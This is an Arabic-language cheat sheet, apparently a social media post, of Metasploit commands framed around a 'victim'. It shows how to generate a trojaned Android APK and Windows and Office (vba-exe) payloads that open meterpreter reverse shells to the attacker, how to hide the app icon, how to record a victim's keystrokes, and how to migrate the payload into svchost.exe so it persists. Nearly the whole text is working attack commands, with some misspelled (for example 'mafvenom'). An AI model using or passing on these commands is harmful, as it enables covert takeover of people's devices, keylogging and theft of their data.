+) صنع بايلود ملغم ~>

$ msfvenom -p android/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -o <name>.apk


+) الأستغلال ~>

$ use exploit/multi/handler
$ set payload android/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ exploit -x hide_app_icon

_____________________________________________
التنصت على لوحة مفاتيح الضحية

+) أوامر الأستغلال ~>

$ use post/windows/capture/keylog_recorder
$ set session <numper session target>
$ exploit

____________________________________________


نقل عملية الاختراق داخل proceess عند قتل البايلود

+) أوامر الأستغلال ~>

$ use payload/windows/meterprerter/reverse_tcp
$ show advanced
$ set prependmigrate true
$ set prependmigrateproc svchost.exe
$ set LHOST <ip>
$ set LPORT <port>
$ generate -t exe -f <path>
____________________________________________

تلغيم ملفات Microsoft Offic

+) أمر تلغيم ~>

$ mafvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f vba-exe

+) أوامر الأستغلال ~>
$ use exploit/multi/handler
$ set payload windows/meterpreter/reverse_tcp
$ set LHOST <ip>
$ set LPORT <port>
$ exploit
____________________________________________
👍1